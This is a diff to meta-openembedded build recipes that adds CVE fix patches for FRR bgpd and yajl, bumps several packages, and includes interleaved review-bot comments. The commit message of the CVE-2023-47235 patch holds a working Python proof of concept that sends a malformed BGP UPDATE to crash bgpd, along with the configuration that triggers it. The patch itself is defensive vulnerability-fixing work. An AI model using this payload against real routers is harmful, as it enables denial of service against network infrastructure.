new file mode 100644
index 0000000000..754f9345a0
--- /dev/null
+++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch
@@ -0,0 +1,95 @@
+From c37119df45bbf4ef713bc10475af2ee06e12f3bf Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Sun, 29 Oct 2023 22:44:45 +0200
+Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI
+
+If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if
+no mandatory path attributes received.
+
+In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled
+as a new data, but without mandatory attributes, it's a malformed packet.
+
+In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST
+handle that.
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf]
+CVE: CVE-2023-47234
+Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de>
+---
+ bgpd/bgp_attr.c | 19 ++++++++++---------
+ bgpd/bgp_attr.h | 1 +
+ bgpd/bgp_packet.c | 7 ++++++-
+ 3 files changed, 17 insertions(+), 10 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index 1473dc772502..75aa2ac7cce6 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3399,15 +3399,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ !length)
+ return BGP_ATTR_PARSE_WITHDRAW;
+
+- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+- are present, it should. Check for any other attribute being present
+- instead.
+- */
+- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
+- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))))
+- return BGP_ATTR_PARSE_PROCEED;
+-
+ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN)))
+ type = BGP_ATTR_ORIGIN;
+
+@@ -3426,6 +3417,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF)))
+ type = BGP_ATTR_LOCAL_PREF;
+
++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required
++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI
++ * are present, it should. Check for any other attribute being present
++ * instead.
++ */
++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) &&
++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))
++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY
++ : BGP_ATTR_PARSE_PROCEED;
++
+ /* If any of the well-known mandatory attributes are not present
+ * in an UPDATE message, then "treat-as-withdraw" MUST be used.
+ */
+diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h
+index fc347e7a1b4b..d30155e6dba0 100644
+--- a/bgpd/bgp_attr.h
++++ b/bgpd/bgp_attr.h
+@@ -364,6 +364,7 @@ enum bgp_attr_parse_ret {
+ /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR
+ */
+ BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3,
++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4,
+ };
+
+ struct bpacket_attr_vec_arr;
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index a7514a26aa64..5dc35157ebf6 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -2359,7 +2359,12 @@ static int bgp_update_receive(struct peer_connection *connection,
+ /* Network Layer Reachability Information. */
+ update_len = end - stream_pnt(s);
+
+- if (update_len && attribute_len) {
++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then
++ * NLRIs should be handled as a new data. Though, if we received
++ * NLRIs without mandatory attributes, they should be ignored.
++ */
++ if (update_len && attribute_len &&
++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) {
+ /* Set NLRI portion to structure. */
+ nlris[NLRI_UPDATE].afi = AFI_IP;
+ nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
+--
+2.42.1
+
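Review bot: `BGP_ATTR_PARSE_MISSING_MANDATORY = -4` is added to `enum bgp_attr_parse_ret` without a comment, unlike the `-3` entry directly above it, and the only consumer taught about it in the visible hunks is the `update_len && attribute_len` test in `bgp_update_receive`. Please document on the enum member what the value means (MP_UNREACH_NLRI present, mandatory attributes absent, trailing NLRIs to be ignored), and check that the other code that inspects the parse result, including the `if (ret < 0) goto done;` after `bgp_attr_check`, does the intended thing with it. Note also that `bgp_attr_check` is declared `static int` while returning members of this enum.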
diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch
new file mode 100644
index 0000000000..b06ba94a34
--- /dev/null
+++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch
@@ -0,0 +1,112 @@
+From 6814f2e0138a6ea5e1f83bdd9085d9a77999900b Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis <donatas@opensourcerouting.org>
+Date: Fri, 27 Oct 2023 11:56:45 +0300
+Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of
+ malformed attrs
+
+Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
+processed as a normal UPDATE without mandatory attributes, that could lead
+to harmful behavior. In this case, a crash for route-maps with the configuration
+such as:
+
+```
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 127.0.0.1 remote-as external
+ neighbor 127.0.0.1 passive
+ neighbor 127.0.0.1 ebgp-multihop
+ neighbor 127.0.0.1 disable-connected-check
+ neighbor 127.0.0.1 update-source 127.0.0.2
+ neighbor 127.0.0.1 timers 3 90
+ neighbor 127.0.0.1 timers connect 1
+ !
+ address-family ipv4 unicast
+ neighbor 127.0.0.1 addpath-tx-all-paths
+ neighbor 127.0.0.1 default-originate
+ neighbor 127.0.0.1 route-map RM_IN in
+ exit-address-family
+exit
+!
+route-map RM_IN permit 10
+ set as-path prepend 200
+exit
+```
+
+Send a malformed optional transitive attribute:
+
+```
+import socket
+import time
+
+OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
+b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
+b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
+b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
+b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
+b"\x80\x00\x00\x00")
+
+KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")
+
+UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.2', 179))
+s.send(OPEN)
+data = s.recv(1024)
+s.send(KEEPALIVE)
+data = s.recv(1024)
+s.send(UPDATE)
+data = s.recv(1024)
+time.sleep(100)
+s.close()
+```
+
+Reported-by: Iggy Frankovic <iggyfran@amazon.com>
+Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
+Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b]
+CVE: CVE-2023-47235
+Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de>
+---
+ bgpd/bgp_attr.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
+index cf2dbe65b805..1473dc772502 100644
+--- a/bgpd/bgp_attr.c
++++ b/bgpd/bgp_attr.c
+@@ -3391,10 +3391,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr,
+ uint8_t type = 0;
+
+ /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an
+- * empty UPDATE. */
++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it,
++ * we will pass it to be processed as a normal UPDATE without mandatory
++ * attributes, that could lead to harmful behavior.
++ */
+ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag &&
+ !length)
+- return BGP_ATTR_PARSE_PROCEED;
++ return BGP_ATTR_PARSE_WITHDRAW;
+
+ /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required
+ to carry any other path attributes.", though if MP_REACH_NLRI or NLRI
+@@ -3889,7 +3892,13 @@ done:
+ aspath_unintern(&as4_path);
+
+ transit = bgp_attr_get_transit(attr);
+- if (ret != BGP_ATTR_PARSE_ERROR) {
++ /* If we received an UPDATE with mandatory attributes, then
++ * the unrecognized transitive optional attribute of that
++ * path MUST be passed. Otherwise, it's an error, and from
++ * security perspective it might be very harmful if we continue
++ * here with the unrecognized attributes.
++ */
++ if (ret == BGP_ATTR_PARSE_PROCEED) {
+ /* Finally intern unknown attribute. */
+ if (transit)
+ bgp_attr_set_transit(attr, transit_intern(transit));
+--
+2.42.1
+
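Review bot: Narrowing the test after `done:` from `ret != BGP_ATTR_PARSE_ERROR` to `ret == BGP_ATTR_PARSE_PROCEED` means `transit` is no longer interned for every other return value, including the `BGP_ATTR_PARSE_WITHDRAW` that this patch introduces in `bgp_attr_check`. The hunk does not show what then happens to the pointer obtained from `bgp_attr_get_transit(attr)`; please confirm the non-PROCEED path frees or detaches it, so the backport neither leaks it nor leaves an un-interned transit attribute attached to `attr`.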
diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb
index bddc08aebb..c447df0512 100644
--- a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb
+++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb
@@ -9,9 +9,15 @@ LICENSE = "GPL-2.0-only & LGPL-2.1-only"
LIC_FILES_CHKSUM = "file://doc/licenses/GPL-2.0;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://doc/licenses/LGPL-2.1;md5=4fbd65380cdd255951079008b364516c"
+PR = "r1"
+
SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/9.0 \
file://frr.pam \
file://0001-tools-make-quiet-actually-suppress-output.patch \
+ file://CVE-2023-46752.patch \
+ file://CVE-2023-46753.patch \
+ file://CVE-2023-47235.patch \
+ file://CVE-2023-47234.patch \
"
SRCREV = "31ed3dd753d62b5d8916998bc32814007e91364b"
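Review bot: The new `SRC_URI` entries list `CVE-2023-47235.patch` before `CVE-2023-47234.patch`. That matches the `index` lines inside the patch files (47235 is `cf2dbe65b805..1473dc772502` and 47234 starts from `1473dc772502`), so the order is required, but it reads like a sorting mistake and is likely to be "fixed" later. Add a one-line comment above these entries saying the patches must be applied in this order.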
diff --git a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb
index a5fc158749..3688ce4091 100644
--- a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb
+++ b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "A full-featured SSL VPN solution via tun device."
HOMEPAGE = "https://openvpn.net/"
SECTION = "net"
LICENSE = "GPL-2.0-only"
-LIC_FILES_CHKSUM = "file://COPYING;md5=3170e982baae61dbb8de963317d1ac94"
+LIC_FILES_CHKSUM = "file://COPYING;md5=d8d34ce6390552676e4ce8279f13c48a"
DEPENDS = "lzo lz4 openssl iproute2 libcap-ng ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
inherit autotools systemd update-rc.d pkgconfig
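Review bot: The md5 in `LIC_FILES_CHKSUM` for COPYING changes as part of the 2.6.3 to 2.6.6 bump with no explanation visible here. The commit message should say what changed in COPYING (the usual `License-Update:` line), so that it is clear `LICENSE = "GPL-2.0-only"` is still accurate for the new release.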
@@ -14,7 +14,7 @@ SRC_URI = "http://swupdate.openvpn.org/community/releases/${BP}.tar.gz \
UPSTREAM_CHECK_URI = "https://openvpn.net/community-downloads"
-SRC_URI[sha256sum] = "13b207a376d8880507c74ff78aabc3778a9da47c89f1e247dcee3c7237138ff6"
+SRC_URI[sha256sum] = "3b074f392818b31aa529b84f76e8b5e4ad03fca764924f46d906bceaaf421034"
CVE_STATUS[CVE-2020-27569] = "not-applicable-config: Applies only Aviatrix OpenVPN client, not openvpn"
diff --git a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb
index fb1bea2d87..87d12bc6c8 100644
--- a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb
+++ b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb
@@ -11,7 +11,7 @@ DEPENDS:append = "${@bb.utils.contains('DISTRO_FEATURES', 'tpm2', ' tpm2-tss',
SRC_URI = "https://download.strongswan.org/strongswan-${PV}.tar.bz2 \
"
-SRC_URI[sha256sum] = "ddf53f1f26ad26979d5f55e8da95bd389552f5de3682e35593f9a70b2584ed2d"
+SRC_URI[sha256sum] = "5e6018b07cbe9f72c044c129955a13be3e2f799ceb53f53a4459da6a922b95e5"
UPSTREAM_CHECK_REGEX = "strongswan-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb
index a5d614961a..8db456b99c 100644
--- a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb
+++ b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb
@@ -42,4 +42,6 @@ RDEPENDS:${PN} += " \
dnf \
libnewt-python \
"
+BBCLASSEXTEND = "nativesdk"
+
SKIP_RECIPE[dnf-plugin-tui] ?= "${@bb.utils.contains('PACKAGE_CLASSES', 'package_rpm', '', 'does not build correctly without package_rpm in PACKAGE_CLASSES', d)}"
diff --git a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb
index d30d9c3466..19ef987387 100644
--- a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb
+++ b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb
@@ -7,7 +7,7 @@ RDEPENDS:${PN} = "libusb1"
SRC_URI = " \
git://repo.or.cz/openocd.git;protocol=http;name=openocd;branch=master \
git://repo.or.cz/r/git2cl.git;protocol=http;destsuffix=tools/git2cl;name=git2cl;branch=master \
- git://github.com/msteveb/jimtcl.git;protocol=http;destsuffix=git/jimtcl;name=jimtcl;branch=master \
+ git://github.com/msteveb/jimtcl.git;protocol=https;destsuffix=git/jimtcl;name=jimtcl;branch=master \
git://repo.or.cz/r/libjaylink.git;protocol=http;destsuffix=git/src/jtag/drivers/libjaylink;name=libjaylink;branch=master \
"
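Review bot: Only the jimtcl URL is switched to `protocol=https`; the openocd, git2cl and libjaylink entries on repo.or.cz still use `protocol=http`, so those sources are still fetched over a plaintext transport. If repo.or.cz serves these repositories over https, switch them in the same change; if it does not, say so in the commit message so the remaining `http` entries are a recorded decision rather than an oversight.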
diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch
new file mode 100644
index 0000000000..1241ff9e31
--- /dev/null
+++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch
@@ -0,0 +1,37 @@
+From 0b5e73c4321de0ba1d495fdc0967054b2a77931c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Mon, 10 Jul 2023 13:36:10 +0100
+Subject: [PATCH] Fix for CVE-2017-16516
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Description: Fix for CVE-2017-16516
+ Potential buffer overread: A JSON file can cause denial of service.
+Origin: https://github.com/brianmario/yajl-ruby/commit/a8ca8f476655adaa187eedc60bdc770fff3c51ce
+
+CVE: CVE-2017-16516
+Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/248]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+---
+ src/yajl_encode.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/yajl_encode.c b/src/yajl_encode.c
+index fd08258..0d97cc5 100644
+--- a/src/yajl_encode.c
++++ b/src/yajl_encode.c
+@@ -139,8 +139,8 @@ void yajl_string_decode(yajl_buf buf, const unsigned char * str,
+ end+=3;
+ /* check if this is a surrogate */
+ if ((codepoint & 0xFC00) == 0xD800) {
+- end++;
+- if (str[end] == '\\' && str[end + 1] == 'u') {
++ if (end + 2 < len && str[end + 1] == '\\' && str[end + 2] == 'u') {
++ end++;
+ unsigned int surrogate = 0;
+ hexToDigit(&surrogate, str + end + 2);
+ codepoint =
+--
+2.34.1
+
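Review bot: In the yajl_string_decode change, the new guard `end + 2 < len` bounds only the two bytes it compares (`str[end + 1]` and `str[end + 2]`), while the `hexToDigit(&surrogate, str + end + 2)` call that follows the `end++` reads further into the buffer, and nothing in the hunk checks that range against `len`. Either extend the condition to cover the bytes hexToDigit consumes, or add a comment naming the earlier validation that guarantees they are present. The header marks this as Upstream-Status: Submitted with an Origin in yajl-ruby, so the patch has to be carried and re-checked on every yajl update.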
diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch
new file mode 100644
index 0000000000..0dc859099d
--- /dev/null
+++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch
@@ -0,0 +1,59 @@
+From 17de4d15687aa30c49660dc4b792b1fb4d38b569 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20P=C3=ADsa=C5=99?= <ppisar@redhat.com>
+Date: Thu, 7 Apr 2022 17:29:54 +0200
+Subject: [PATCH] Fix CVE-2022-24795
+
+There was an integer overflow in yajl_buf_ensure_available() leading
+to allocating less memory than requested. Then data were written past
+the allocated heap buffer in yajl_buf_append(), the only caller of
+yajl_buf_ensure_available(). Another result of the overflow was an
+infinite loop without a return from yajl_buf_ensure_available().
+
+yajl-ruby project, which bundles yajl, fixed it
+<https://github.com/brianmario/yajl-ruby/pull/211> by checking for the
+integer overflow, fortifying buffer allocations, and report the
+failures to a caller. But then the caller yajl_buf_append() skips
+a memory write if yajl_buf_ensure_available() failed leading to a data
+corruption.
+
+A yajl fork mainter recommended calling memory allocation callbacks with
+the large memory request and let them to handle it. But that has the
+problem that it's not possible pass the overely large size to the
+callbacks.
+
+This patch catches the integer overflow and terminates the process
+with abort().
+
+CVE: CVE-2022-24795
+Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/239]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+---
+ src/yajl_buf.c | 12 +++++++++++-
+ 1 file changed, 11 insertions(+), 1 deletion(-)
+
+diff --git a/src/yajl_buf.c b/src/yajl_buf.c
+index 1aeafde..55c11ad 100644
+--- a/src/yajl_buf.c
++++ b/src/yajl_buf.c
+@@ -45,7 +45,17 @@ void yajl_buf_ensure_available(yajl_buf buf, size_t want)
+
+ need = buf->len;
+
+- while (want >= (need - buf->used)) need <<= 1;
++ if (((buf->used > want) ? buf->used : want) > (size_t)(buf->used + want)) {
++ /* We cannot allocate more memory than SIZE_MAX. */
++ abort();
++ }
++ while (want >= (need - buf->used)) {
++ if (need >= (size_t)((size_t)(-1)<<1)>>1) {
++ /* need would overflow. */
++ abort();
++ }
++ need <<= 1;
++ }
+
+ if (need != buf->len) {
+ buf->data = (unsigned char *) YA_REALLOC(buf->alloc, buf->data, need);
+--
+2.34.1
+
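Review bot: Both new overflow paths in yajl_buf_ensure_available() end in abort(), so an oversized request now terminates the whole process that links yajl. The commit message says so, but it is worth stating in the recipe's change description that the heap overflow has been traded for a crash, because a long-running consumer that parses untrusted JSON still has a denial of service. The two checks are also hard to read: the first is equivalent to `want > SIZE_MAX - buf->used`, and `(size_t)((size_t)(-1)<<1)>>1` is `SIZE_MAX >> 1`; the named constant would make the intent obvious. The diffstat shows 11 insertions in this one hunk and no include change, so please confirm that yajl_buf.c already includes <stdlib.h> for abort().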
diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch
new file mode 100644
index 0000000000..47454dc8af
--- /dev/null
+++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch
@@ -0,0 +1,35 @@
+Fix memory leaks. Taken from the Fedora packaging (https://src.fedoraproject.org/rpms/yajl)
+where it was backported from openEuler.
+
+CVE: CVE-2023-33460
+Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/250]
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/src/yajl_tree.c b/src/yajl_tree.c
+index 3d357a3..56c7012 100644
+--- a/src/yajl_tree.c
++++ b/src/yajl_tree.c
+@@ -143,7 +143,7 @@ static yajl_val context_pop(context_t *ctx)
+ ctx->stack = stack->next;
+
+ v = stack->value;
+-
++ free (stack->key);
+ free (stack);
+
+ return (v);
+@@ -444,7 +444,14 @@ yajl_val yajl_tree_parse (const char *input,
+ snprintf(error_buffer, error_buffer_size, "%s", internal_err_str);
+ YA_FREE(&(handle->alloc), internal_err_str);
+ }
++ while(ctx.stack != NULL) {
++ yajl_val v = context_pop(&ctx);
++ yajl_tree_free(v);
++ }
+ yajl_free (handle);
++ //If the requested memory is not released in time, it will cause memory leakage
++ if(ctx.root)
++ yajl_tree_free(ctx.root);
+ return NULL;
+ }
+
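Review bot: The added `free (stack->key);` in context_pop() runs on every pop, which is only safe if each path that hands the key over to an object also clears `stack->key`; the hunk does not show that, so please confirm it or say so in the patch description, to rule out a double free on the success path. In the yajl_tree_parse error path, the drain loop frees every popped value and `ctx.root` is then freed separately; a short comment on why the root can never also be reachable from the stack would help. The patch header has no From/Subject/Date lines, unlike the other two yajl patches, and the `//` comment does not match the `/* */` style visible in those patches.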
diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb
index cf8dbb183e..2a34210f3c 100644
--- a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb
+++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb
@@ -8,7 +8,11 @@ HOMEPAGE = "http://lloyd.github.com/yajl/"
LICENSE = "ISC"
LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d"
-SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https"
+SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https \
+ file://CVE-2017-16516.patch \
+ file://CVE-2022-24795.patch \
+ file://CVE-2023-33460.patch \
+ "
SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa"
S = "${WORKDIR}/git"
diff --git a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb
index 95cb29775a..0382e6bdfe 100644
--- a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb
+++ b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb
@@ -13,7 +13,7 @@ inherit cmake pkgconfig binconfig
PACKAGES =+ "geoslib ${PN}-c1"
DESCRIPTION:${PN}lib = "Geometry engine for Geographic Information Systems - C++ Library"
-FILES:${PN}lib += "${libdir}/libgeos-${PV}.so"
+FILES:${PN}lib += "${libdir}/libgeos.so.*"
DESCRIPTION:${PN}-c1 = "Geometry engine for Geographic Information Systems - C Library"
FILES:${PN}-c1 += "${libdir}/libgeos_c.so.*"
diff --git a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb
index 68b91c0b0c..e716430673 100644
--- a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb
+++ b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb
@@ -7,7 +7,7 @@ SECTION = "libs"
LICENSE = "HDF5"
LIC_FILES_CHKSUM = "file://COPYING;md5=9ba0f3d878ab6c2403c86e9b0362d998"
-inherit cmake siteinfo qemu multilib_header
+inherit cmake siteinfo qemu multilib_header multilib_script
DEPENDS += "qemu-native zlib"
@@ -40,6 +40,10 @@ EOF
do_unpack[postfuncs] += "gen_emu"
+MULTILIB_SCRIPTS += "${PN}:${bindir}/h5cc \
+ ${PN}:${bindir}/h5hlcc \
+"
+
do_install:append() {
# Used for generating config files on target
install -m 755 ${B}/bin/H5detect ${D}${bindir}
diff --git a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb
index 56d4253772..b834069733 100644
--- a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb
+++ b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb
@@ -5,7 +5,7 @@ SECTION = "System/Base"
LICENSE = "GPL-2.0-or-later | XFree86-1.0"
LIC_FILES_CHKSUM = "file://LICENSE;md5=1556547711e8246992b999edd9445a57"
-SRCREV = "21cb47beb1716545b25dfe8ae1b9e079c73b85d9"
+SRCREV = "b9ba5bc9eecbeeff441806695b227c3c3de4755c"
SRC_URI = "git://github.com/vcrhonek/${BPN}.git;branch=master;protocol=https"
S = "${WORKDIR}/git"
diff --git a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb
index 926a603b81..28e40f66e3 100644
--- a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb
+++ b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb
@@ -10,7 +10,7 @@ S = "${WORKDIR}/git"
B = "${S}"
SRCREV = "6e83cc6f6dff4f126fc79284e0c3c1c50123380d"
-SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=main;protocol=https"
+SRC_URI = "git://github.com/storaged-project/libbytesize;branch=main;protocol=https"
inherit gettext autotools pkgconfig python3native
diff --git a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb
index ae4b3b9bf6..a7a9019e33 100644
--- a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb
+++ b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb
@@ -29,7 +29,7 @@ DEPENDS = "libdevmapper \
LICENSE = "GPL-2.0-only"
-SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=http;branch=master \
+SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=https;branch=master \
file://multipathd.oe \
file://multipath.conf.example \
file://0021-RH-fixup-udev-rules-for-redhat.patch \
diff --git a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb
index 12532e4ef1..dc73497257 100644
--- a/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb
+++ b/meta-openembedded/meta-oe/recipes-support/poco/poco_1.12.4.bb
@@ -8,13 +8,13 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=4267f48fc738f50380cbeeb76f95cebc"
# These dependencies are required by Foundation
DEPENDS = "libpcre2 zlib"
-SRC_URI = "git://github.com/pocoproject/poco.git;branch=master;protocol=https \
+SRC_URI = "git://github.com/pocoproject/poco.git;branch=poco-1.12.4;protocol=https \
file://0001-Use-std-atomic-int-instead-of-std-atomic-bool.patch \
file://0001-cppignore.lnx-Ignore-PKCS12-and-testLaunch-test.patch \
file://0001-Fix-data-race-when-create-POSIX-thread.patch \
file://run-ptest \
"
-SRCREV = "1211613642269b7d53bea58b02de7fcd25ece3b9"
+SRCREV = "3572a1fb981672e2cd1d2533ffd836da7db0f414"
UPSTREAM_CHECK_GITTAGREGEX = "poco-(?P<pver>\d+(\.\d+)+)"
